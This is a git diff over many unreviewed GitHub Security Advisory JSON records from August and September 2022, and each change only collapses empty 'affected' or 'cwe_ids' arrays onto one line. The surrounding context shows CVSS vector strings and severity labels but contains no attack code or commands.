b/advisories/unreviewed/2022/08/GHSA-g38m-wh86-jrvf/GHSA-g38m-wh86-jrvf.json index 1b450cac794..f72018d37ea 100644 --- a/advisories/unreviewed/2022/08/GHSA-g38m-wh86-jrvf/GHSA-g38m-wh86-jrvf.json +++ b/advisories/unreviewed/2022/08/GHSA-g38m-wh86-jrvf/GHSA-g38m-wh86-jrvf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-g8qv-x989-399f/GHSA-g8qv-x989-399f.json b/advisories/unreviewed/2022/08/GHSA-g8qv-x989-399f/GHSA-g8qv-x989-399f.json index c031cd018b2..21bf23ba097 100644 --- a/advisories/unreviewed/2022/08/GHSA-g8qv-x989-399f/GHSA-g8qv-x989-399f.json +++ b/advisories/unreviewed/2022/08/GHSA-g8qv-x989-399f/GHSA-g8qv-x989-399f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-hjq3-pmvg-xrgv/GHSA-hjq3-pmvg-xrgv.json b/advisories/unreviewed/2022/08/GHSA-hjq3-pmvg-xrgv/GHSA-hjq3-pmvg-xrgv.json index d9b97aba908..eb46707fa8c 100644 --- a/advisories/unreviewed/2022/08/GHSA-hjq3-pmvg-xrgv/GHSA-hjq3-pmvg-xrgv.json +++ b/advisories/unreviewed/2022/08/GHSA-hjq3-pmvg-xrgv/GHSA-hjq3-pmvg-xrgv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-jjj4-8crq-rjw2/GHSA-jjj4-8crq-rjw2.json b/advisories/unreviewed/2022/08/GHSA-jjj4-8crq-rjw2/GHSA-jjj4-8crq-rjw2.json index bdbe1c63a6c..ec1a29772d1 100644 --- a/advisories/unreviewed/2022/08/GHSA-jjj4-8crq-rjw2/GHSA-jjj4-8crq-rjw2.json +++ b/advisories/unreviewed/2022/08/GHSA-jjj4-8crq-rjw2/GHSA-jjj4-8crq-rjw2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-m549-ppcm-976x/GHSA-m549-ppcm-976x.json b/advisories/unreviewed/2022/08/GHSA-m549-ppcm-976x/GHSA-m549-ppcm-976x.json index e3995b59932..560b226681c 100644 --- a/advisories/unreviewed/2022/08/GHSA-m549-ppcm-976x/GHSA-m549-ppcm-976x.json +++ b/advisories/unreviewed/2022/08/GHSA-m549-ppcm-976x/GHSA-m549-ppcm-976x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-p3f7-94hf-7gvm/GHSA-p3f7-94hf-7gvm.json b/advisories/unreviewed/2022/08/GHSA-p3f7-94hf-7gvm/GHSA-p3f7-94hf-7gvm.json index 1ce2b96436d..1b9aaa5baec 100644 --- a/advisories/unreviewed/2022/08/GHSA-p3f7-94hf-7gvm/GHSA-p3f7-94hf-7gvm.json +++ b/advisories/unreviewed/2022/08/GHSA-p3f7-94hf-7gvm/GHSA-p3f7-94hf-7gvm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-pq6v-9mc6-vvmh/GHSA-pq6v-9mc6-vvmh.json b/advisories/unreviewed/2022/08/GHSA-pq6v-9mc6-vvmh/GHSA-pq6v-9mc6-vvmh.json index adbdc42fba9..ddde857b580 100644 --- a/advisories/unreviewed/2022/08/GHSA-pq6v-9mc6-vvmh/GHSA-pq6v-9mc6-vvmh.json +++ b/advisories/unreviewed/2022/08/GHSA-pq6v-9mc6-vvmh/GHSA-pq6v-9mc6-vvmh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-pv3r-42p6-x9fr/GHSA-pv3r-42p6-x9fr.json b/advisories/unreviewed/2022/08/GHSA-pv3r-42p6-x9fr/GHSA-pv3r-42p6-x9fr.json index 457eeec963d..7cb7affe3ae 100644 --- a/advisories/unreviewed/2022/08/GHSA-pv3r-42p6-x9fr/GHSA-pv3r-42p6-x9fr.json +++ b/advisories/unreviewed/2022/08/GHSA-pv3r-42p6-x9fr/GHSA-pv3r-42p6-x9fr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-qrxx-5p97-w2cw/GHSA-qrxx-5p97-w2cw.json b/advisories/unreviewed/2022/08/GHSA-qrxx-5p97-w2cw/GHSA-qrxx-5p97-w2cw.json index 1cf15398da5..3ca4d514bef 100644 --- a/advisories/unreviewed/2022/08/GHSA-qrxx-5p97-w2cw/GHSA-qrxx-5p97-w2cw.json +++ b/advisories/unreviewed/2022/08/GHSA-qrxx-5p97-w2cw/GHSA-qrxx-5p97-w2cw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-rw3w-3gcw-68q4/GHSA-rw3w-3gcw-68q4.json b/advisories/unreviewed/2022/08/GHSA-rw3w-3gcw-68q4/GHSA-rw3w-3gcw-68q4.json index 4f95403dbe4..1256cba63d1 100644 --- a/advisories/unreviewed/2022/08/GHSA-rw3w-3gcw-68q4/GHSA-rw3w-3gcw-68q4.json +++ b/advisories/unreviewed/2022/08/GHSA-rw3w-3gcw-68q4/GHSA-rw3w-3gcw-68q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-rw8x-8xfq-w736/GHSA-rw8x-8xfq-w736.json b/advisories/unreviewed/2022/08/GHSA-rw8x-8xfq-w736/GHSA-rw8x-8xfq-w736.json index 0b769fe7460..68196320ca9 100644 --- a/advisories/unreviewed/2022/08/GHSA-rw8x-8xfq-w736/GHSA-rw8x-8xfq-w736.json +++ b/advisories/unreviewed/2022/08/GHSA-rw8x-8xfq-w736/GHSA-rw8x-8xfq-w736.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-v2r5-7h93-6hpm/GHSA-v2r5-7h93-6hpm.json b/advisories/unreviewed/2022/08/GHSA-v2r5-7h93-6hpm/GHSA-v2r5-7h93-6hpm.json index 670e0b613e6..8728bfa0ef2 100644 --- a/advisories/unreviewed/2022/08/GHSA-v2r5-7h93-6hpm/GHSA-v2r5-7h93-6hpm.json +++ b/advisories/unreviewed/2022/08/GHSA-v2r5-7h93-6hpm/GHSA-v2r5-7h93-6hpm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-w2xp-vgjc-6653/GHSA-w2xp-vgjc-6653.json b/advisories/unreviewed/2022/08/GHSA-w2xp-vgjc-6653/GHSA-w2xp-vgjc-6653.json index 80664a450eb..46df4adf12c 100644 --- a/advisories/unreviewed/2022/08/GHSA-w2xp-vgjc-6653/GHSA-w2xp-vgjc-6653.json +++ b/advisories/unreviewed/2022/08/GHSA-w2xp-vgjc-6653/GHSA-w2xp-vgjc-6653.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-w947-m339-3246/GHSA-w947-m339-3246.json b/advisories/unreviewed/2022/08/GHSA-w947-m339-3246/GHSA-w947-m339-3246.json index 51255b6ed69..9c976aadd59 100644 --- a/advisories/unreviewed/2022/08/GHSA-w947-m339-3246/GHSA-w947-m339-3246.json +++ b/advisories/unreviewed/2022/08/GHSA-w947-m339-3246/GHSA-w947-m339-3246.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-wmhh-453x-wvw9/GHSA-wmhh-453x-wvw9.json b/advisories/unreviewed/2022/08/GHSA-wmhh-453x-wvw9/GHSA-wmhh-453x-wvw9.json index 0625b39e39e..a549245a24d 100644 --- a/advisories/unreviewed/2022/08/GHSA-wmhh-453x-wvw9/GHSA-wmhh-453x-wvw9.json +++ b/advisories/unreviewed/2022/08/GHSA-wmhh-453x-wvw9/GHSA-wmhh-453x-wvw9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-wp9c-hm9w-q3wj/GHSA-wp9c-hm9w-q3wj.json b/advisories/unreviewed/2022/08/GHSA-wp9c-hm9w-q3wj/GHSA-wp9c-hm9w-q3wj.json index 977ab852780..fabed1274b1 100644 --- a/advisories/unreviewed/2022/08/GHSA-wp9c-hm9w-q3wj/GHSA-wp9c-hm9w-q3wj.json +++ b/advisories/unreviewed/2022/08/GHSA-wp9c-hm9w-q3wj/GHSA-wp9c-hm9w-q3wj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/08/GHSA-x9c5-jqpw-mhvj/GHSA-x9c5-jqpw-mhvj.json b/advisories/unreviewed/2022/08/GHSA-x9c5-jqpw-mhvj/GHSA-x9c5-jqpw-mhvj.json index b4a77065cfb..95c8e271bea 100644 --- a/advisories/unreviewed/2022/08/GHSA-x9c5-jqpw-mhvj/GHSA-x9c5-jqpw-mhvj.json +++ b/advisories/unreviewed/2022/08/GHSA-x9c5-jqpw-mhvj/GHSA-x9c5-jqpw-mhvj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/08/GHSA-xw2m-g5w8-2fwc/GHSA-xw2m-g5w8-2fwc.json b/advisories/unreviewed/2022/08/GHSA-xw2m-g5w8-2fwc/GHSA-xw2m-g5w8-2fwc.json index 2e8bfc1c460..758380f8003 100644 --- a/advisories/unreviewed/2022/08/GHSA-xw2m-g5w8-2fwc/GHSA-xw2m-g5w8-2fwc.json +++ b/advisories/unreviewed/2022/08/GHSA-xw2m-g5w8-2fwc/GHSA-xw2m-g5w8-2fwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-27v6-4m9p-3qq4/GHSA-27v6-4m9p-3qq4.json b/advisories/unreviewed/2022/09/GHSA-27v6-4m9p-3qq4/GHSA-27v6-4m9p-3qq4.json index e3c0545f294..68daedc0e01 100644 --- a/advisories/unreviewed/2022/09/GHSA-27v6-4m9p-3qq4/GHSA-27v6-4m9p-3qq4.json +++ b/advisories/unreviewed/2022/09/GHSA-27v6-4m9p-3qq4/GHSA-27v6-4m9p-3qq4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-27wf-832r-r7vc/GHSA-27wf-832r-r7vc.json b/advisories/unreviewed/2022/09/GHSA-27wf-832r-r7vc/GHSA-27wf-832r-r7vc.json index 4a7394d8a7b..8a7eb439344 100644 --- a/advisories/unreviewed/2022/09/GHSA-27wf-832r-r7vc/GHSA-27wf-832r-r7vc.json +++ b/advisories/unreviewed/2022/09/GHSA-27wf-832r-r7vc/GHSA-27wf-832r-r7vc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-2h7v-c8c8-vxg7/GHSA-2h7v-c8c8-vxg7.json b/advisories/unreviewed/2022/09/GHSA-2h7v-c8c8-vxg7/GHSA-2h7v-c8c8-vxg7.json index 94b906b8929..2c8071b0f81 100644 --- a/advisories/unreviewed/2022/09/GHSA-2h7v-c8c8-vxg7/GHSA-2h7v-c8c8-vxg7.json +++ b/advisories/unreviewed/2022/09/GHSA-2h7v-c8c8-vxg7/GHSA-2h7v-c8c8-vxg7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-2wqp-mx6p-m496/GHSA-2wqp-mx6p-m496.json b/advisories/unreviewed/2022/09/GHSA-2wqp-mx6p-m496/GHSA-2wqp-mx6p-m496.json index 993629f529a..8c19ee637df 100644 --- a/advisories/unreviewed/2022/09/GHSA-2wqp-mx6p-m496/GHSA-2wqp-mx6p-m496.json +++ b/advisories/unreviewed/2022/09/GHSA-2wqp-mx6p-m496/GHSA-2wqp-mx6p-m496.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-32c6-653x-x3pm/GHSA-32c6-653x-x3pm.json b/advisories/unreviewed/2022/09/GHSA-32c6-653x-x3pm/GHSA-32c6-653x-x3pm.json index c70dd61e0dd..b46d283725f 100644 --- a/advisories/unreviewed/2022/09/GHSA-32c6-653x-x3pm/GHSA-32c6-653x-x3pm.json +++ b/advisories/unreviewed/2022/09/GHSA-32c6-653x-x3pm/GHSA-32c6-653x-x3pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-37cj-9g83-7692/GHSA-37cj-9g83-7692.json b/advisories/unreviewed/2022/09/GHSA-37cj-9g83-7692/GHSA-37cj-9g83-7692.json index b025d37d919..4fd2cf82a5c 100644 --- a/advisories/unreviewed/2022/09/GHSA-37cj-9g83-7692/GHSA-37cj-9g83-7692.json +++ b/advisories/unreviewed/2022/09/GHSA-37cj-9g83-7692/GHSA-37cj-9g83-7692.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-37g5-jpqm-9jr7/GHSA-37g5-jpqm-9jr7.json b/advisories/unreviewed/2022/09/GHSA-37g5-jpqm-9jr7/GHSA-37g5-jpqm-9jr7.json index 1f62294e7dd..99fe68b75b7 100644 --- a/advisories/unreviewed/2022/09/GHSA-37g5-jpqm-9jr7/GHSA-37g5-jpqm-9jr7.json +++ b/advisories/unreviewed/2022/09/GHSA-37g5-jpqm-9jr7/GHSA-37g5-jpqm-9jr7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-45vc-8wxf-vrvf/GHSA-45vc-8wxf-vrvf.json b/advisories/unreviewed/2022/09/GHSA-45vc-8wxf-vrvf/GHSA-45vc-8wxf-vrvf.json index 6efea6f9f1f..087b7568818 100644 --- a/advisories/unreviewed/2022/09/GHSA-45vc-8wxf-vrvf/GHSA-45vc-8wxf-vrvf.json +++ b/advisories/unreviewed/2022/09/GHSA-45vc-8wxf-vrvf/GHSA-45vc-8wxf-vrvf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-49c7-gf66-cc93/GHSA-49c7-gf66-cc93.json b/advisories/unreviewed/2022/09/GHSA-49c7-gf66-cc93/GHSA-49c7-gf66-cc93.json index 76c6adbeb08..1290f4f30ad 100644 --- a/advisories/unreviewed/2022/09/GHSA-49c7-gf66-cc93/GHSA-49c7-gf66-cc93.json +++ b/advisories/unreviewed/2022/09/GHSA-49c7-gf66-cc93/GHSA-49c7-gf66-cc93.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-4cf6-725j-v28m/GHSA-4cf6-725j-v28m.json b/advisories/unreviewed/2022/09/GHSA-4cf6-725j-v28m/GHSA-4cf6-725j-v28m.json index 84fadcd30a1..d5697104c0e 100644 --- a/advisories/unreviewed/2022/09/GHSA-4cf6-725j-v28m/GHSA-4cf6-725j-v28m.json +++ b/advisories/unreviewed/2022/09/GHSA-4cf6-725j-v28m/GHSA-4cf6-725j-v28m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-4m75-cr73-v7hw/GHSA-4m75-cr73-v7hw.json b/advisories/unreviewed/2022/09/GHSA-4m75-cr73-v7hw/GHSA-4m75-cr73-v7hw.json index 790e6fa3dbc..db37be5e20a 100644 --- a/advisories/unreviewed/2022/09/GHSA-4m75-cr73-v7hw/GHSA-4m75-cr73-v7hw.json +++ b/advisories/unreviewed/2022/09/GHSA-4m75-cr73-v7hw/GHSA-4m75-cr73-v7hw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-57v8-x3g4-p832/GHSA-57v8-x3g4-p832.json b/advisories/unreviewed/2022/09/GHSA-57v8-x3g4-p832/GHSA-57v8-x3g4-p832.json index 1d24c2f7f6f..b676dbb0d47 100644 --- a/advisories/unreviewed/2022/09/GHSA-57v8-x3g4-p832/GHSA-57v8-x3g4-p832.json +++ b/advisories/unreviewed/2022/09/GHSA-57v8-x3g4-p832/GHSA-57v8-x3g4-p832.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-5fp5-vv6c-j2hj/GHSA-5fp5-vv6c-j2hj.json b/advisories/unreviewed/2022/09/GHSA-5fp5-vv6c-j2hj/GHSA-5fp5-vv6c-j2hj.json index 8b700279007..011e0a69575 100644 --- a/advisories/unreviewed/2022/09/GHSA-5fp5-vv6c-j2hj/GHSA-5fp5-vv6c-j2hj.json +++ b/advisories/unreviewed/2022/09/GHSA-5fp5-vv6c-j2hj/GHSA-5fp5-vv6c-j2hj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-5j86-vmpx-42pc/GHSA-5j86-vmpx-42pc.json b/advisories/unreviewed/2022/09/GHSA-5j86-vmpx-42pc/GHSA-5j86-vmpx-42pc.json index 8a1f083dfb0..487e7345af9 100644 --- a/advisories/unreviewed/2022/09/GHSA-5j86-vmpx-42pc/GHSA-5j86-vmpx-42pc.json +++ b/advisories/unreviewed/2022/09/GHSA-5j86-vmpx-42pc/GHSA-5j86-vmpx-42pc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-5q53-x3g6-993r/GHSA-5q53-x3g6-993r.json b/advisories/unreviewed/2022/09/GHSA-5q53-x3g6-993r/GHSA-5q53-x3g6-993r.json index 3b014af7f5a..724dadf9eb2 100644 --- a/advisories/unreviewed/2022/09/GHSA-5q53-x3g6-993r/GHSA-5q53-x3g6-993r.json +++ b/advisories/unreviewed/2022/09/GHSA-5q53-x3g6-993r/GHSA-5q53-x3g6-993r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-5xm4-48v6-7p2f/GHSA-5xm4-48v6-7p2f.json b/advisories/unreviewed/2022/09/GHSA-5xm4-48v6-7p2f/GHSA-5xm4-48v6-7p2f.json index bed90510d64..9ae3ad0a788 100644 --- a/advisories/unreviewed/2022/09/GHSA-5xm4-48v6-7p2f/GHSA-5xm4-48v6-7p2f.json +++ b/advisories/unreviewed/2022/09/GHSA-5xm4-48v6-7p2f/GHSA-5xm4-48v6-7p2f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-637r-47cq-j74p/GHSA-637r-47cq-j74p.json b/advisories/unreviewed/2022/09/GHSA-637r-47cq-j74p/GHSA-637r-47cq-j74p.json index 6f3dfbf1306..588ea36409d 100644 --- a/advisories/unreviewed/2022/09/GHSA-637r-47cq-j74p/GHSA-637r-47cq-j74p.json +++ b/advisories/unreviewed/2022/09/GHSA-637r-47cq-j74p/GHSA-637r-47cq-j74p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-669q-4gjm-8895/GHSA-669q-4gjm-8895.json b/advisories/unreviewed/2022/09/GHSA-669q-4gjm-8895/GHSA-669q-4gjm-8895.json index 1cd2a49d54b..747fb855578 100644 --- a/advisories/unreviewed/2022/09/GHSA-669q-4gjm-8895/GHSA-669q-4gjm-8895.json +++ b/advisories/unreviewed/2022/09/GHSA-669q-4gjm-8895/GHSA-669q-4gjm-8895.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-6859-c7gv-hqq5/GHSA-6859-c7gv-hqq5.json b/advisories/unreviewed/2022/09/GHSA-6859-c7gv-hqq5/GHSA-6859-c7gv-hqq5.json index 9d18fbb3741..6993033e538 100644 --- a/advisories/unreviewed/2022/09/GHSA-6859-c7gv-hqq5/GHSA-6859-c7gv-hqq5.json +++ b/advisories/unreviewed/2022/09/GHSA-6859-c7gv-hqq5/GHSA-6859-c7gv-hqq5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-7853-2h44-89w4/GHSA-7853-2h44-89w4.json b/advisories/unreviewed/2022/09/GHSA-7853-2h44-89w4/GHSA-7853-2h44-89w4.json index 19333a6844d..05481ce1d0d 100644 --- a/advisories/unreviewed/2022/09/GHSA-7853-2h44-89w4/GHSA-7853-2h44-89w4.json +++ b/advisories/unreviewed/2022/09/GHSA-7853-2h44-89w4/GHSA-7853-2h44-89w4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-7873-9v2g-3whm/GHSA-7873-9v2g-3whm.json b/advisories/unreviewed/2022/09/GHSA-7873-9v2g-3whm/GHSA-7873-9v2g-3whm.json index b9cb0ba29ee..9ede1a38f21 100644 --- a/advisories/unreviewed/2022/09/GHSA-7873-9v2g-3whm/GHSA-7873-9v2g-3whm.json +++ b/advisories/unreviewed/2022/09/GHSA-7873-9v2g-3whm/GHSA-7873-9v2g-3whm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-7m65-hmvg-rxpc/GHSA-7m65-hmvg-rxpc.json b/advisories/unreviewed/2022/09/GHSA-7m65-hmvg-rxpc/GHSA-7m65-hmvg-rxpc.json index 0248c534874..710313538b9 100644 --- a/advisories/unreviewed/2022/09/GHSA-7m65-hmvg-rxpc/GHSA-7m65-hmvg-rxpc.json +++ b/advisories/unreviewed/2022/09/GHSA-7m65-hmvg-rxpc/GHSA-7m65-hmvg-rxpc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json b/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json index 8a070713618..0fd0a7a7165 100644 --- a/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json +++ b/advisories/unreviewed/2022/09/GHSA-7r3w-wggm-pjwf/GHSA-7r3w-wggm-pjwf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-8hwf-7cch-jr9v/GHSA-8hwf-7cch-jr9v.json b/advisories/unreviewed/2022/09/GHSA-8hwf-7cch-jr9v/GHSA-8hwf-7cch-jr9v.json index 933ed772c06..622464981c5 100644 --- a/advisories/unreviewed/2022/09/GHSA-8hwf-7cch-jr9v/GHSA-8hwf-7cch-jr9v.json +++ b/advisories/unreviewed/2022/09/GHSA-8hwf-7cch-jr9v/GHSA-8hwf-7cch-jr9v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 